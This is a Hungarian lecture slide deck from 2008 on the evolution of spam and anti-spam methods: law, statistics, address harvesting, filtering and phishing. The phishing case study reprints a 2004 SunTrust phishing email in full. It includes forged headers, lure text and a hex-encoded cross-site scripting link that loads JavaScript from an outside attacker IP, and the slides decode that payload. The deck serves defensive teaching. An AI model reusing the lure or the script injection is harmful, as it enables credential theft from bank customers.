The evolution of spam techniques and countermeasures

The evolution of spam techniques and countermeasures Hámor Tamás Hellinger Péter Réti Kornél Révay Gergely Tutsek Bálint Bevezető SPAM: a fogadó által nem kért, elektronikusan, például e-mailen keresztül tömegesen küldött hirdetés, felhívás. Az elnevezés eredete: Spiced Pork And Ham Egy angol konzervként forgalmazott hústermék, mely egy komikus filmjelenet (Monty Python Flying Circus egyik epizódja) alapján lett a ránkerőltetett valami jelölője. (Más elnevezések még: shit posing as mail, stupid pointless annoying messages ) 12/15/2008 The evolution of spam techniques and countermeasures 2

Törvényi háttér USA: CAN-SPAM: (2003 dec.) Első komolyabb lépés a törvényi szabályozásra, de komolyabb eredményeket nem érnek el vele ( You can spam ) Jelenleg: Államonként eltérő, de többnyire elég szigorú. Pl.: Virginiában 25 000 dollár/nap, szövetségi szinten pedig 100 dollár/spam EU: 2002: Az első átfogó spamtörvényt, de az Unión kívülről érkező kéretlen levelek ellen nem nyújt védelmet. Mégis az első európai kártérítési per csak 2006 elején (Nigel Roberts). 12/15/2008 The evolution of spam techniques and countermeasures 3 Törvényi háttér Magyarországon (2008 szept. 1-től): A 2008. évi XLVIII. tv. (a gazdasági reklámtevékenység alapvető feltételeiről és egyes korlátairól) 6. (1)-a alapján kéretlen elektronikus, üzletszerzést célzó reklámüzenet (azaz spam) csak természetes személynek nem küldhető előzetes beleegyezés nélkül. http://images4.wikia.nocookie.net/spam/hu/images/d/dc/ Legfobbszabalyok.pdf 12/15/2008 The evolution of spam techniques and countermeasures 4

Motivációk, célok Támadó (spammer): Még az esetleges bűnetetések mellett is ez az egyik legolcsóbb, leghatákonyabb és legtöbbeket megcélzó módja a direkt marketing hirdetéseknek, reklámoknak, átveréseknek, adathalászatnak Felhasználó, szolgáltató: Minél kisebb tévedés mellett kiszűrni a kéretlen hirdetéseket!!! 12/15/2008 The evolution of spam techniques and countermeasures 5 Legfrissebb statisztikai adatok SPAM-ek aránya a 2008-as év első az e-mailek 92,3%-a volt spam, azaz tizenöt levélből csak egy nem kéretlen hirdetés. 2008 második negyedére ez az érték 77%-ra mérséklődött!!! Küldött SPAM-ek száma éves és 100napos viszonylatban: 12/15/2008 The evolution of spam techniques and countermeasures 6

Legfrissebb statisztikai adatok és hogy honnan jutottunk el idáig: 12/15/2008 The evolution of spam techniques and countermeasures 7 Legfrissebb statisztikai adatok Országos és domain statisztikák: élen az USA és a Yahoo 12/15/2008 The evolution of spam techniques and countermeasures 8

Legfrissebb statisztikai adatok Spamtípusok szerint: 18%-a hirdet valamiféle terméket 20% pénzügyi 17% egészségügyi tartalmú 4% kínál pornográfiát 2% politikai célú 1% phishing támadás Legek a SPAMvilágból: Az első bizonyított és ismert táviratspamet 1904. szeptember 13-án küldték el. Legnagyobb kártérítés spamek miatt: 11,2 milliárd dollár Legnagyobb büntetés: 5,3 millió dollár + 300 000 dolláros perköltség (AOL - 2006 január) Legtöbb elküldött spam: 1012 billió kéretlen reklámlevél (Kim Ha-Na egy dél-koreai spammer álneve) 12/15/2008 The evolution of spam techniques and countermeasures 9 Okozott károk http://www.commtouch.com/site/resources/calculator.asp Letöltési/kiválogatási idő Tárhely Forgalom, sávszélesség Átverések 12/15/2008 The evolution of spam techniques and countermeasures 10

Mi ellen védekezzünk, a spam-melés folyamata Címgyűjtés A SPAM típusának és tartalmának kiválasztása/megtervezése Célpont ( felhasználó, szerver) meghatározása Küldés útjának megtervezése Az okozható károk elkerülése (pl. phishing) Minden egyes fázis ellen védekezhetünk 12/15/2008 The evolution of spam techniques and countermeasures 11 Nem E-Mail alapú SPAM Hámor Tamás

Kéretlen reklámok és üzenetek típusai E-Mail SMS Telefonhívás Fax Levél, prospektus (Direct Marketing) TV, DVD, Filmek Instant Messaging (MSN, Jabber, ICQ, IRC, stb.) Közösségi oldalak (iwiw, Facebook, Myspace, Hi5, stb.) Blogok, híroldalak, Wiki-k Street SPAM SMS spam, spasms, mobilspam E-Mailhez hasonlóan opt-in, adatkezelési irányelvek (ügyfélszolgálat, kezelt adatok lekérdezhetőek, körük minimális, adatkezelés célja ismert) Adatgyűjtés: pl. hostess lányok, weboldalak Védekezés: Nem beregisztrálni, lemondani, NHH-nál vagy Fogyasztóvédelemnél panaszt tenni Szia! Még nem ismerjük egymást, a barátnömtöl kaptam a számod. Uncsizom és dumcsiznék egyet! Ugye visszahívsz? Flóra és Heni. A számom: 0681****** Feladó: +36 30 *******

Telefon (telemarketing, direkt marketing) Gépi- vagy személyes megkeresés (Ön nyert!/ Ismeri új csomagunkat?) Opt-out: Robinson lista Adatgyűjtés: pl. telefonkönyv, hostess lányok, weboldalak Védekezés: Nem beregisztrálni, lemondani, NHH-nál vagy Fogyasztóvédelemnél panaszt tenni, Robinson lista Faxspam, Junk fax A címzettnek is pénzbe kerül (papír, tinta) 2007. évi XCIV. tv. (Az elektronikus kereskedelemmel kapcsolatos egyes törvények módosításáról) tiltja

Postai küldemény (Direkt Marketing) Névre szóló Regisztráció, ügyfélszolgálat, adatvédelem, sorsjáték bejelentés Opt-out: Robinson lista Matrica a levelesládán: nem jelent semmit Címek központi lakcímnyilvántartásból, telefonkönyvből TV, DVD, Filmek TV Magyarországon meghatározott műsoridőreklámidő arány Kábelszolgáltató saját reklámokat vág be DVD Át nem ugorható reklámok Filmek Több országban tilos a tudat alatti reklám (1-2 képkocka) Márkák a filmekben

Spim: Instant Messaging, Chat (1) Vírusok üzeneteket küldenek az áldozat nevében Phishing oldal elkéri a jelszavakat és úgy küld üzeneteket Az üzenetek tartalmazhatnak kártékony oldalakra mutató linket Kártékony programok közvetlenül is küldhetőek megtévesztő kiterjesztéssel Több IM szűri a linkeket (lásd MSN vs Youtube) Spim: Instant Messaging, Chat (2) Chat spam: botok egy-egy üzenet erejéig belépnek szobákba (netes játékokban is) VoIP: hangüzenetek pl. Skype-on vagy játékokban (CS )

Weboldalak, blogok Felugró ablakok (Warez, gyógyszer, pr0n) Villogó, mozgó Flash/GIF anim (Ön Nyert!) Megtévesztés (pl. ablaknak kinéző kép, lásd Phishing technikák) Böngészőablak átméretezése, mozgatása Vágólap SPAM Komment SPAM Meghívó SPAM Spamdexing Social Networking Módszerek: Üzenetekben: üzenőfal, vagy privát üzenet (pl. láncüzenetek) Hamis felhasználók Csoportok, fan oldalak Kisalkalmazások Meghívók Személyes adatok Védekezés: Értesítések tiltása Küldők tájékoztatása Kapcsolat megszakítása Blokkolás Jelentés Leiratkozás

Street SPAM Szórólapok Plakátok Stenclik, matricák Az e-mail spamküldés egyes lépései és megakadályozásuk Réti Kornél

Áttekintés A spamküldés folyamata Címgyűjtés Megrendelés Üzenet összeállítása Elküldés Kézbesítés Hatás kifejtése 12/15/2008 The evolution of spam techniques and countermeasures 25 Címgyűjtés Módszerek: Kereskedés vagy csere kollégával Szótár alapú találgatás domain-en belül Email-cím megadás kérése (cserébe ingyenes szolg.) Vásárlás legitim szolgáltatótól Gyűjtögetés robottal Eredmény: Címlista tartalmaz rossz, duplikátum, szerep, idegen címeket is Nem baj, nincs plusz költség 12/15/2008 The evolution of spam techniques and countermeasures 26

Címgyűjtés Gyűjtögetés honnan: Robotok: fórumokból, archívumokból } webről Eleve publikált címeket Vírusok, kémprogramok: a merevlemezedről Akár személyes, titkos címeket is Védekezés: Listamérgezés (list poisoning) Kapcsolatfelvételi űrlap (contact form) Címferdítés (address munging) Utasításokkal gond: buta emberek, okos robotok Átlátszóan gond lehet: felolvasóprogramok, szöveges böngészők 12/15/2008 The evolution of spam techniques and countermeasures 27 Címgyűjtés Élő címek ellenőrzése: Web bug a HTML levelekben Leiratkozás link Védekezés: HTML kikapcsolása :-/ Internetes URL-ek követésének kikapcsolása Ne kattints rá! 12/15/2008 The evolution of spam techniques and countermeasures 28

Elküldés Forrásgép Saját, rejtve (álfejléccel, proxyval) Internet café Botnet Forráscím Autogenerált webmail címek Nem létező, hamis címek (open relay) Mások email címei (vírusok) 12/15/2008 The evolution of spam techniques and countermeasures 29 Elküldés Open Relay SMTP szerverek Bárki küldhet, bármilyen címről jaj! Hosszú BCC lista volt (már egyedi emailek) Megoldási kísérletek POP before SMTP Átlátszó, de bizonytalan SMTP-AUTH Nem véd a hamisítás ellen. Gyenge pont a user password ISP smart host-ok Kábel/DSL tiltása, szigorú RFC formátum 12/15/2008 The evolution of spam techniques and countermeasures 30

Elküldés Továbbított spam kivédése Greylisting, nolisting } szigorú RFC DNSBL technológia DNS alapon lekérdezhető IP feketelista Létezik URI-lista is Alkalmazások: MAPS RBL ORBS SPEWS, APEWS 12/15/2008 The evolution of spam techniques and countermeasures 31 Spam trap Honeypot spam ellen Weben csapda email címek publikálása Ember számára nem látható Robot földolgozza Csak spam jön rá! Érkező spam elemzése Tartalom analizálása Hasonló levelek blokkolása Forráscím feketelistára tétele Ha lebukik, kihasználható 12/15/2008 The evolution of spam techniques and countermeasures 32

Összegzés Nincs általános megoldás, csak részproblémákra megoldások Szereplők: Email küldők, email várók, email szolgáltatók, egyéb (DNS, ISP, fejlesztők, ) Mindenkinek tenni kell a saját részéről Fejlődő védelem, fejlődő spam Nemcsak műszaki vonatkozások, de mérnöki megoldásokat igényel 12/15/2008 The evolution of spam techniques and countermeasures 33 Tartalom alapú SPAM- szűrés Hellinger PéterP 2008. december 11.

Bevezető Feltételez telezés: lehetséges a megkülönb nböztetés nem triviális: tömeges t levelet tartalom alapján? mégis: egyetlen megkerülhetetlen védekezv dekezés? Támadó és s védekezv dekezési módszerek m fejlődése eredménye: több t szintű, összetett szűrők A fals pozitív v sokkal rosszabb ennek megfelelően en működnek m a szűrők 2008.12.11. Tartalom alapú spamszűrés 35 Kezdeti szűrők és s a DCC Kezdetek kézzel kódolt k egyszerű szabályok pl. tartalmaz egy kifejezést Call Now!!!,, akkor spam Spam ugyanaz az üzenet sokszorosítva fingerprint (hash érték) szerint eldobás spammer változv ltozó részeket ad az üzenetekhez exp. számú signature kellene Distributed Checksum Clearinghouses (DCC) DCC szerver és s kliens kis (UDP) forgalmat generál fuzzy checksums, üzenet bizonyos részeit r ignorálja 2008.12.11. Tartalom alapú spamszűrés 36

Heurisztikus/genetikus szűrők Empirikus szabályok Több szabály tüzelt zelése alapján n lesz spamnek nyílv lvánítva az üzenet komplex szabályok Nagyobb erőforr forrás-igény, mint a statisztikai szűrők 2008.12.11. Tartalom alapú spamszűrés 37 Bayes szűrés s (1) Bayes supervised machine learning spam-ham jellegzetességek gek megtanulása Bayes formula 2008.12.11. Tartalom alapú spamszűrés 38

Bayes szűrés s (2) Legyen attribútumvektor, tumvektor, Naiv Bayes szűrés s (függetlens ggetlenség): g):, relatív v gyakoriságokb gokból 2008.12.11. Tartalom alapú spamszűrés 39 Bayes szűrés s (3) Fals pozitív v legyen -szor olyan rossz! akkor nyilvánítjuk spamnek, ha: lehet akár r 999, ha a spamet automatikusan töröljt ljük. 2008.12.11. Tartalom alapú spamszűrés 40

Bayes szűrés s (4) Tanítás nagy spam és s ham adathalmaz tokenizálás valósz színűségek: Működés tokenizálás fejléc, HTML, Javascript is figyelmen kívül k l hagyni: HTML comment és s csak szám m token tanító halmazban 5-nél 5 l kevesebbszer szereplő token érdekes tokenek: 0.5 valósz színűségtől l távolt 2008.12.11. Tartalom alapú spamszűrés 41 Második generáci ciós s Bayes szűrők Fejlesztés preprocessing pl. helyettesítő karakterek ( @,( $, 1...) tokenizálás, token kombináci ció token: reguláris ris kifejezésnek megfelel token n-esek, n pl. max 5 méretm retű ablak: w4 w5 w3 <skip> w5 w2 <skip> <skip> w5 w1 <skip> <skip> <skip> w5 token súlyozs lyozás 2008.12.11. Tartalom alapú spamszűrés 42

További szűrő módszerek Egyéb b osztályoz lyozó algoritmusok, modellek döntési fák, f SVM, Boosting Linkek (URL) alapján n (elsősorban) sorban) Emerald Spam Shield spamek 95%-a a tartalmaz linket levél l a CyberPatrol hálózath zatára érkezik saját t listájuk van a támadt madó weboldalakról ismeretlen URL esetén n webbot felderíti (veszélyes tartalom, redirecting...) Kombinált megoldások 2008.12.11. Tartalom alapú spamszűrés 43 SpamAssassin Open-source Kb. ezer teszt alapján n pontoz Score értékek tanulása kb. 1 millió kézzel válogatott v levél l alapján gépi tanulás s (genetikus algoritmus, neurális háló) h negatív v score is Miért kell score? statisztikai szűrők folyamatosan tanítani tani kell spammerek új j módszerekkel m próbálj lják k kikerülni Sok technika kombinálva kombinált score nagyon nehezen megtéveszthet veszthető 2008.12.11. Tartalom alapú spamszűrés 44

SpamAssassin tests Néhány teszt példap Default Scores (local, net, with bayes, with bayes+net) <5: : ham 5-12: : spamgyanús >12: spam 2008.12.11. Tartalom alapú spamszűrés 45 Image SPAM 2006-ban nagyon megugrott az arányuk Kép p helye alapján letölt ltés s külsk lső forrásb sból e-mail cím c m létezik! l attachment Szöveg felismerése se a képbenk OCR (Optimal Character Recognition) megtéveszt vesztésese Randomizáló technikákkal kkal egyedi képek k létrehozl trehozása signature ellen Alap megoldások Fehér r lista 2008.12.11. Tartalom alapú spamszűrés 46

2008.12.11. Tartalom alapú spamszűrés 47 2008.12.11. Tartalom alapú spamszűrés 48

Image SPAM új j módszerekm Néhány példa p image spam szűrésre sre Conference of E-mail E and Anti-Spam (CEAS) 2007 & 2008 OCR módszereket m megtéveszt vesztő technikák k detektálása Near-Duplicate Detection Gyors kép k p osztályoz lyozók jó jellemzők k (feature) használata Just In Time (JIT) feature extraction 2008.12.11. Tartalom alapú spamszűrés 49 Összegzés Who-Where Where-What-How szűrési si elv: Who sent the message and what do we know about this sender? Where does the call to action in the message take you? What is the nature of the message content? How was the message technically constructed? 2008.12.11. Tartalom alapú spamszűrés 50

Phishing Készítette: Révay Gergely Előadás menete Phishing típusok 2008 Q1 statisztika Best Practices Esettanulmány

Phishing típusok Phishing: Személyes információ megszerzése egyenesen a végfelhasználótól az Interneten keresztül. Nagy részben 'Social Engineering'. Esetünkben főleg nagymennyiségben kiküldött e-mail-ekkel és hamis honlapokkal. Pharming: Technológiailag fejlettebb és szofisztikáltabb megoldás, már nem a felhasználó figyelmetlenségében bízik, hanem valóban eltéríti a valós URL-t.(hosts fájl átírás, DNS (.. stb cache poisoning Whaling: Ha igazán 'Nagy Halat' akarunk. Nem nagymennyiségben kiküldött e-mail-ekkel, hanem célzott és sokkal jobban megtervezett támadás főleg vezetők ellen. 2008 Q1 statisztika Január Február Március Egyedi phishing bejelentések száma 29284 30716 25630 Egyedi phishing oldal 20305 36002 24908 Támadott védjegyek száma 131 139 141 Legnépszerűbb phishing oldalakat hosztoló ország US US US Valamilyen formában szerepel benne URL 28.30% 23.20% 26.10% Nincs hosztnév, csak IP 5.50% 13.20% 4.00% Nem a 80-as portot használja 0.81% 0.45% 0.49% Legtovább futó honlap 31 nap 29 nap 31 nap

Best Practices -1 1. Inbound szűrés Az eddigi spamszűrő technikák(bayes-szűrés, white/blacklist, URL szűrés) nem nagyon hatékonyak mert az e-mail általában valós e-mail-ek másolata, a honlap pedig több szempontból dinamikusan változik. 2. Üzenetek eldobása Ha az üzenet phishing része akkor ne kerüljön a felhasználó elé. 3. Felhasználó oldali védelem Az ISP ösztönözze a felhasználót a védekezésre. 4. Küldő hitelesítés Az ISP próbálja ellenőrizni a küldőt, amennyiben nem sikerül utasítsa vissza a levelet. Best Practices - 2 5. Képek elrejtése Amíg a felhasználó nem kéri ne mutassuk a képeket a levélben. 6. Hyperlink-ek elrejtése/törlése Így nem csábítja a a felhasználót azonnali klikkelésre. 7. DNS infrastruktúra frissítése Pharming ellen fontos, hogy a hibákat gyorsan javítsák. 8 Tanusítványok használata Csak tanusítvánnyal rendelkező oldalakban bízzunk(de azokban sem feltétlenül).

Phishing Phil http://cups.cs.cmu.edu/antiphishing_phil/ Esettanulmány 2004 november 29-én elfogott levél A Suntrust Bank ügyfeleit támadja A NewScientist.com jelentette a támadást decemberben Különlegessége, hogy több mint 10 technikát használ ebben az egy levélben

Esettanulmány 1 Return-Path: <billing@suntrust.com> Delivered-To: victim-example:com-victim@example.com X-Envelope-To: victim@example.com Received: (qmail 75674 invoked from network); 29 Nov 2004 06:16:27-0000 ( 82.67.84.75 ) Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net by smtp.example.com with SMTP; 29 Nov 2004 06:16:27-0000 X-Message-Info: MU/s+631+rx/BKO+3/216645278374332 Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68- ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263); Tue, 30 Nov 2004 07:12:03-0100 Received: from irs661.insist.billing@suntrust.com (bony989.billing@suntrust.com ([ 82.67.84.75 ] by smtp-collinear.gripe.billing@suntrust.com (Postfix) with SMTP id 185GNY98L9KAW for <victim@example.org>; Tue, 30 Nov 2004 02:08:03-0600 Received: from smtp-russo.candidate.billing@suntrust.com ([82.67.84.75]) by xf63- zh97.billing@suntrust.com with Microsoft SMTPSVC(5.0.1957.3440); Tue, 30 Nov 2004 09:16:03 +0100 X-Message-Info: HMRMU+%ND_LC_CHAR[1-3]97+s+KGV+217/8250521976135 Received: from stickle.billing@suntrust.com ([58.196.169.62]) by deprecate.billing@suntrust.com with MailEnable ESMTP; Tue, 30 Nov 2004 06:13:03-0200 Date: Tue, 30 Nov 2004 01:11:03-0700 Message-Id: <8113167202.92300@billing@suntrust.com> From: Suntrust Billing Department <billing@suntrust.com> To: victim <victim@example.org> Subject: Failure to confirm your records may result in your account suspension. ( 7.4 MIME-Version: 1.0 (produced by zombieatrophic Content-Type: multipart/alternative; boundary="--1587620319582573" X-Spam-Filtered: 1a8847654ec47980fc0f6a3aa0000d3f X-Spam-Status: No, hits=1.1 required=3.5 tests=mime_html_only,bayes_01,http_excessive_escapes,html_50_60,html_link_click_here,mime _HTML_ONLY_MULTI,CLICK_BELOW,HTML_IMAGE_ONLY_10,HTML_MESSAGE X-Spam-Flag: NO X-Spam-Level: * ----1587620319582573 Esettanulmány 2 Content-Type: text/html; charset="iso-8701-7" Content-Transfer-Encoding: quoted-printable Content-Description: habit hysteria contemptuous <html> <head> </head> <body> <img border=3d"0" src=3d"http://www.suntrust.com/images/common/release3/lo= go_home.gif" width=3d"171" height=3d"66"><br> <p align=3d"left"><font face=3d"trebuchet MS">Dear valued Suntrust m= ember, <br> <br> Due to concerns, for the safety and integrity of the online banking commun= ity we have issued the following warning message. <br> <br> It has come to our attention that your account information needs to be con= firmed due to inactive customers, fraud and spoof reports. If you could please ta= ke 5-10 minutes out of your online experience and renew your records you will= not run into any future problems with the online service. However, failure to = confirm your records may result in your account suspension. <br> <br> Once you have confirmed your account records your internet banking service= will not be interrupted and will continue as normal. <br> </font> </p>

Esettanulmány 3 <p align=3d"left"><font face=3d"trebuchet MS">Please <a title=3d"http://suntrust.com/" target=3d"_blank" href=3d"http://www.sun= trust.com/onlinestatements/index.asp?accountverify=3ddf4g653432fvfdsgfsg45= wgsvfwfvfvdfs54v54g5f42f543ff5445wv54w&promo=3d%22%3e%3cscript+language= %3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8= %3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you= r bank account records. <br> <br> <br> Thank you for your time, <br> Suntrust Billing Department.<br> </font></p> <hr><font face=3d"trebuchet MS"> Esettanulmány - 4 <table cellspacing=3d"0" cellpadding=3d"0" width=3d"100%" border=3d"1" id=3d= "table1"> <tr> <td valign=3d"top" align=3d"left" width=3d"30" bordercolorlight=3d"#0000= 00" bordercolor=3d"#000000" bordercolordark=3d"#000000"> <p align=3d"center"><a href=3d"http://www.suntrust.com"> <img border=3d"0" src=3d"http://www.suntrust.com/images/common/leftnav/g= roup_of_people1.jpg" width=3d"156" height=3d"43"></a><br> </td> <td class=3d"footer" valign=3d"top" align=3d"right"> <br> <a href=3d"https://www2.suntrust.com/privacy.html">suntrust</a><a class=3d= "footer" title=3d"https://www2.suntrust.com/privacy.html" target=3d"_blank= " href=3d"https://www2.suntrust.com/privacy.html"> Privacy Promise</a><br> <a class=3d"footer" title=3d"http://www.suntrust.com" target=3d"_blank" = href=3d"http://www.suntrust.com/common/aboutst/about_suntrust.asp"> Terms, conditions, caveats and small print</a><br> <nobr>=a9 2004 SunTrust Banks, Inc. - <img height=3d"9" src=3d"http://www.suntrust.com/images/common/release3/= ehl_house.gif" width=3d"14"> Equal Housing Lender - Member FDIC</nobr></td> </tr> </table> </font> </body> </html> ----1587620319582573--

Esettanulmány 5 Return-Path: billing@suntrust.com Hamisított From címből készíti az utolsó SMTP szerver, ez az alap trükk. Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) Valódi az utolsó SMTP szerver, itt egy francia ISP felhasználója, valószínűleg egy feltört otthoni gép. Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68-ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263); Hamis Received header, ha több van növeli a bizalmat, de mivel @ van a hoszt névben ezért egyértelműen hamis. Ehhez még jönnek a random fehérlistás szavak. Esettanulmány 6 Tue, 30 Nov 2004 07:12:03-0100 Hamis dátum, a jövőben van. Valószínüleg elcsúszott otthoni gép órája okozza. From: Suntrust Billing Department <billing@suntrust.com> Ugyanezt láthatjuk a Return-path-ban is. De elképzelhető, hogy létezik a cím és az osztály. To: victim <victim@example.org> Megszemélyesített címzett. A szándék megvolt a megszemélyesítésre, de ilyenkor általában csak a @ előtti részt másolják át, ami nem mindig adja ki az elvárt [Vezetéknév] [Keresztnév] párt.

Esettanulmány - 7 Subject: Failure to confirm your records may result in your account suspension. Tipikus a phishing-re a negatív motivátor baj lesz ha nem csinálod, a spammel ellentétben ahol általában pozitív motivátor van nagyobb lehet ha megveszed. Content-Type: text/html; Ebben a levélben csak html volt. Jobb helyeken már csatolják ugyanazt plain text-ben is, a kompatibilitás kedvéért. Content-Description: habit hysteria contemptuous Ismét véletlen 'jó' szavak a Bayes szűrők megtévesztésére. Esettanulmány 8 <img border=3d"0" src=3d"http://www.suntrust.com/images/common/release3/lo=go_home.gif" width=3d"171" height=3d"66"><br> Valós képek egyenesen a cég honlapjáról. font face=3d"trebuchet MS">Dear valued Suntrust m= ember, <br> Személytelen megszólítás. Ha a valódi bank írna meg tudná oldani, hogy névre szóljon a levél. Due to concerns, for the safety and integrity of the online banking commun=ity we have issued the following warning message. <br> Fura nyelvtan. Két oka lehet: nem anyanyelvű író, spam szűrő megtévesztése. Az utóbbi érdekében ismert kifejezéseket cserélnek le szinonimákra, itt online banking community = your account.

Esettanulmány 9 <a title=3d"http://suntrust.com/" target=3d"_blank" href=3d"http://www.sun=trust.com/onlinestatements/index.asp?accountveri fy=3ddf4g653432fvfdsgfsg45= wgsvfwfvfvdfs54v54g5f42f543ff5445wv54w&promo=3d%22%3e%3csc ript+language= %3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2 E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E" >click here</a> to confirm you= r bank account records. <br> Ez három fontos elemet hordoz magában. 1. ScreenTip: <a title="http://suntrust.com/" target="_blank" 2. Link a valódi oldalra : href="http://www.suntrust.com/onlinestatements/index.asp?accountverify=d f4g653432fvfdsgfsg45wgsvfwfvfvdfs54v54g5f42f543ff5445wv54w&pro mo= Esettanulmány 10 3. Szkriptelés Hex kódolt HTTP praméterekből dekódolt szkript: <SCRIPT language=javascript src="http://218.103.23.138:8081/sun/sun.js"</script>. Sajnos a szervert elég gyorsan lekapcsolták ezért nem derült ki mit csinál pontosan a sun.js. A Suntrust számla ellenőrző oldalának volt egy Cross- Site Scripting hibája. A támadó valószínűleg ezt használta ki, hogy megváltoztassa az oldalukat olyanra, hogy onnan meg tudja szerezni a felhsználó adatait.

Összefoglalás Kifejezetten aktív műfaj napjainkban Nehéz ellene védekezni Több mint Social Engineering Már komoly technikai háttere van Köszönöm a figyelmet! Kérdések?